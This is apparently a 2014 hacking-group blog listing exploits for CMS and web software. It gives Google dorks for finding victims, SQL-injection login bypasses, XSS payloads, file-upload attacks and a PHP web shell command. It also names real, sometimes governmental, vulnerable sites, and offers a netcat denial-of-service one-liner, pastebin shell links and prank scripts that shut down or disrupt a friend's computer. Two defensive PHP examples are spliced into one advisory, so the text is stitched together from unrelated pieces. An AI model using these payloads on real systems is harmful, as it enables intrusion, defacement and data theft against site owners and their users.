Thursday, August 14, 2014

GEL CMS 4.0 SQL Injection

2:44:00 PM Under From Admin

SQLi Bypass super-admin GEL CMS 4.0

Google Dork: inurl:/contact-us_id7.php
Example Target: http://www.visitbartlesville.com/login.php

Login panel path: http://www.[target].com/login.php

SQL string:

Username: 'or'1'='1
Password: 'or'1'='1

Wednesday, August 13, 2014

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

1:34:00 PM Under From Admin

Google Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/

Exploit Path : /wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

Example Exploit Path :
http://www.[target].com/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

File Upload Path :

http://www.[target].com/wp-content/uploads/ckfinder/files/x.txt

Example Targets :
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

Tuesday, August 12, 2014

IBM Sametime Meet Server 8.5 Arbitrary File Upload

11:55:00 AM Under From Admin

Google Dork : intitle:"New Meet - IBM Lotus"

Exploit Path : /stconf.nsf/wAttach?OpenForm

Example Target: http://www.[target].com/stconf.nsf/wAttach?OpenForm

Examples:
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm

http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm

Monday, August 11, 2014

Wordpress Js plupload Cross Site Scripting

9:37:00 PM Under From Admin


Google Dork : inurl:/wp-includes/js/plupload

Exploit Path :
http://www.[target].com/wp-includes/js/plupload/plupload.flash.swf?id=[XSS]

Example Vuln Websites:

http://nexiran.ir/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

http://wwwxad-qom.ir/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

http://maxewest.com/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

http://mexnter.thieme.com/log/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

Sunday, August 10, 2014

SHARP MX Series - Denial Of Service

10:23:00 PM Under From Admin

Google Dork: "SHARP Telnet server"

$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23

$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused

This vulnerability leads to a denial of service.

Unfortunately, we were unable to retrieve the core dump, but
this flaw might result in a buffer overflow allowing remote command execution.


Make your own fake "virus"

12:22:00 AM Under From Admin



How to freak your friends with fake virus


Just copy and paste these codes into Notepad and save them with a .bat or .vbs extension.

Send message and shut down his / her computer:

@echo off
msg * I love you ! <3
shutdown -c "Error! Your computer is shit" -s
Save it as "Anything.BAT" in All Files and send it.


Matrix Falling Code Effect:

Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks


Toggle your friend's Caps Lock button continuously:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it, or open it on your friend's PC.


To make your own live disco:

1. Open Notepad.
2. Copy paste the exact code given below

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


Continually pop/eject out your friend's CD Drive:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.


Frustrate your friend by making this VBScript hit Enter continuously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS"


Frustrate your friend by making this VBScript hit Backspace continuously:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS"

Open Notepad continually in your friend's computer:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.

Like our official Facebook fan page for more tutorial :)
https://www.facebook.com/UmbrellaSec

Saturday, August 9, 2014

Massive defaced by Umbrella Security August 09, 2014

6:08:00 PM Under From Admin

List of Hacked Websites:

WordPress thecotton Themes Remote File Upload

2:40:00 PM Under From Admin

Google Dork: inurl:/wp-content/themes/thecotton_v114/

Save file as thecotton-wp.php
http://pastebin.com/raw.php?i=6hfNrAKD

After upload you can find your shell there:
http://127.0.0.1/wordpress/wp-content/uploads/2014/9/upload.php

Friday, August 8, 2014

Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

8:56:00 PM Under From Admin


Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities

Google Dork: intitle:"Powered by Pro Chat Rooms"

1) Stored XSS
=============

The Text Chat Room Software of Pro Chat Rooms is vulnerable to stored XSS. After registering an account, an attacker can
upload a profile picture containing JavaScript code, as shown below:

POST: http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg

<script>alert(document.cookie)</script>

Inspecting the response shows that the web application returns a 32-digit value in the hidden input field "imgID", as shown
below:

Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">

The picture is uploaded under the directory "/profiles/uploads" and is accessible by forced browsing to the 32-digit
value, as shown below:

http://www.[target].com/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b


2) Reflected XSS
=============

The Text Chat Room Software of Pro Chat Rooms is vulnerable to reflected XSS. The parameter "edit" is not encoded:

http://www.[target].com/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script>



3) SQL Injection
================

The Text Chat Room Software of Pro Chat Rooms is vulnerable to SQL injection. Throughout the web application's source code,
parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves
the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:

prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users
SET email = '".$email."',
password='".md5($password)."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users
SET email = '".$email."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'
";

Note that the “makeSafe” function is defined as shown below and will protect against XSS attacks only:

prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
$data = htmlspecialchars($data);

return $data;
}


After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which
will retrieve the MD5 hashed password of the administrator:

POST http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#


The following SQL injection will retrieve the SQL connection string, which probably has clear-text database
credentials.

POST http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#
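
The three concatenated UPDATE statements above are closed off by binding the values as parameters. The script below is an added example, not Pro Chat Rooms code or part of the original advisory; it assumes PDO with an in-memory SQLite table standing in for the MySQL backend, and the function names boundEmailUpdate and updateEmail are hypothetical.

```php
<?php
// Added example (not Pro Chat Rooms code). Assumptions: PDO with in-memory SQLite stands
// in for the MySQL backend; the table is a constructed subset of prochatrooms_users.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE prochatrooms_users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)');
$pdo->exec("INSERT INTO prochatrooms_users VALUES (1, 'admin@example.test', 'h1'), (2, 'user@example.test', 'h2')");

// makeSafe() as quoted in the advisory. ENT_COMPAT was the default before PHP 8.1 and
// leaves single quotes alone, so the value can still close a '...' SQL string literal.
function makeSafe(string $data): string
{
    return htmlspecialchars($data, ENT_COMPAT);
}

// Binding only: the value is passed as a parameter instead of being spliced into the
// SQL text, so quotes, '#' and sub-selects in it are stored as data, not parsed as SQL.
function boundEmailUpdate(PDO $pdo, int $id, string $email): int
{
    $stmt = $pdo->prepare('UPDATE prochatrooms_users SET email = :email WHERE id = :id');
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Binding plus input validation: what a profile-edit handler should call.
function updateEmail(PDO $pdo, $id, string $email): bool
{
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false; // reject instead of trying to "clean" the value
    }
    return boundEmailUpdate($pdo, $id, $email) === 1;
}

// The profileEmail value from the advisory, used here as test input.
$payload = "mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#";

var_dump(strpos(makeSafe($payload), "'") !== false);   // does the quote survive makeSafe()?
var_dump(updateEmail($pdo, '2', $payload));            // validation result for the payload
var_dump(updateEmail($pdo, '2', 'new@example.test'));  // validation result for a normal address

// With validation skipped, the bound payload still only changes row 2 and is stored verbatim.
boundEmailUpdate($pdo, 2, $payload);
foreach ($pdo->query('SELECT id, email FROM prochatrooms_users ORDER BY id') as $row) {
    echo $row['id'], ': ', $row['email'], PHP_EOL;
}
```

On MySQL the same prepare/bindValue calls apply unchanged; only the DSN differs.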


4) Arbitrary File Upload 
=========================

It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.

The following request will upload a PHP web shell and the web application will return a 32 digit value.

POST: http://www.[target].com/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream

<?php system($_GET[cmd]);?>

Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">

Since the uploaded web shell is without extension it will not be executed:

http://www.[target].com/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45
<?php system($_GET[cmd]);?>
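
A server-side check for the upload handling described in sections 1 and 4, given as an added example rather than Pro Chat Rooms code or part of the original advisory. The function names detectAllowedImage and responseHeadersFor are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example (not Pro Chat Rooms code); function names are hypothetical.
declare(strict_types=1);

const ALLOWED_IMAGE_TYPES = ['image/jpeg', 'image/png', 'image/gif'];

// Classify an upload from its bytes. The client-supplied Content-Type and filename
// ("image/jpeg", "nopic333.jpg") are attacker-controlled and are not consulted.
function detectAllowedImage(string $bytes): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if (!is_string($mime) || !in_array($mime, ALLOWED_IMAGE_TYPES, true)) {
        return null;
    }
    // The magic-byte guess must agree with a parse of the image header.
    $info = @getimagesizefromstring($bytes);
    if ($info === false || $info['mime'] !== $mime) {
        return null;
    }
    return $mime;
}

// Headers for serving a stored upload. A file can be a valid image and still carry
// markup, so the content check is only a first filter: the fixed Content-Type plus
// nosniff is what stops a browser from interpreting the bytes as HTML.
function responseHeadersFor(string $mime): array
{
    return [
        'Content-Type: ' . $mime,
        'X-Content-Type-Options: nosniff',
        "Content-Security-Policy: default-src 'none'; sandbox",
    ];
}

// Constructed sample inputs: the upload body from section 1 and a minimal PNG
// header (signature + IHDR for a 1x1 RGBA image, no pixel data).
$pngHeader = "\x89PNG\r\n\x1a\n" . "\x00\x00\x00\x0dIHDR" . pack('N2', 1, 1) . "\x08\x06\x00\x00\x00";
$samples = [
    'script body sent as image/jpeg' => '<script>alert(document.cookie)</script>',
    'constructed PNG header'         => $pngHeader,
];

foreach ($samples as $label => $bytes) {
    $mime = detectAllowedImage($bytes);
    echo $label, ' => ', $mime === null ? 'rejected' : 'accepted as ' . $mime, PHP_EOL;
    if ($mime !== null) {
        echo '  ', implode(PHP_EOL . '  ', responseHeadersFor($mime)), PHP_EOL;
    }
}
```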


Thursday, August 7, 2014

WordPress Dandelion Themes Arbitrary File Upload

1:45:00 PM Under From Admin

Google Dork: inurl:/wp-content/themes/dandelion/ 

Download .php file & save as wpupload.php
http://pastebin.com/raw.php?i=WWVN5bQq

You can find your shell at :
http://www.[target].com/uploads/[years]/[month]/shell.php

WordPress 0day CSRF All Version

10:37:00 AM Under From Admin

This tool is public. I found a claim from Mauritania that this tool was coded by him. HAH, no guys, don't be stupid, this is not by Mauritania; he is a liar. It's simple: this PHP file downloads /wp-config.php from the site and reads it. The method is old; I found it and used it manually to see how it works.

Save as: wpcfg.php
Download Link: http://pastebin.com/raw.php?i=60G2t8ai

WebDav RootKit Tool

12:42:00 AM Under From Admin

Download Link: Click Here

Virus Scan Link: Click Here


Google Dorks:
inurl:.asp site:cn
inurl:.asp site:id
inurl:.asp site:kr
inurl:.asp site:in
inurl:.asp site:ru
inurl:.asp site:gr

Rss aggregator Upload Shell

12:20:00 AM Under From Admin

# Google Dork : inurl:"/feed-sources"
# Google Dork : inurl:"/top-hits-items"
# Exploit : /upload/feeds_logos/
# Shell : http://www.target.com/upload/feeds_logos/shell.php

Save as: uploader.html

<html>
<title>RSS script Shell Upload Exploit</title>
<center>
# dork : inurl:"/feed-sources" inurl:"/top-hits-items"<br>
# exploit :Test exploit --> /upload/feeds_logos/<br><br>
<form action="http://www.target.com/admin/feeds.php?do=edit&id=1" method="post" enctype="multipart/form-data">
<label for="file">File :</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
</center>
</html>

Wednesday, August 6, 2014

Powered by Shop 737 Exploit

7:10:00 PM Under From Admin

Google Dork: "powered by shop737"
Google Dork: "/poto/index.php"
Google Dork: "/poto/kategori_1/"
Google Dork: "/poto/upload.php"

Example:
www.[target].com/poto/index.php
to
www.[target].com/poto/upload.php


Default Password
user & pass: admin



Download Shell from there !
Shell Code [shell.php.xxxjpg]
http://pastebin.com/Mj38TPNM



Sunday, August 3, 2014

JCE Dorks

11:59:00 AM Under From Admin


Joomla Component JCE File Upload Dorks


Find us on Facebook: https://www.facebook.com/Official1337/

inurl:/templates/lexicon/
inurl:/templates/beez/
inurl:/templates/atomic/
inurl:/templates/beez2/

inurl:"/images/stories/" intext:"food"
inurl:"/images/stories/" intext:"fruit"

inurl:/administrator/templates/khepri/
inurl:/administrator/templates/system/
inurl:/administrator/templates/bluestork/
inurl:/images/stories/food
inurl:/images/stories/fruit 

intext:"Powered By Joomla 2.5"
intext:"Powered By Joomla 3.x"
intext:"Joomla! Administration Login"
intitle:"Index of /images/stories/" intext:"powered_by.png"

intitle:"Index of /images/stories/" intext:"joomla-dev_cycle.png"
intitle:"Index of /images/stories/food"
intitle:"Index of /images/stories/fruit"

ASP Dorks

11:54:00 AM Under From Admin


These are useful dorks for SQL Injection.

Find us on Facebook: http://www.fb.com/UmbrellaSec

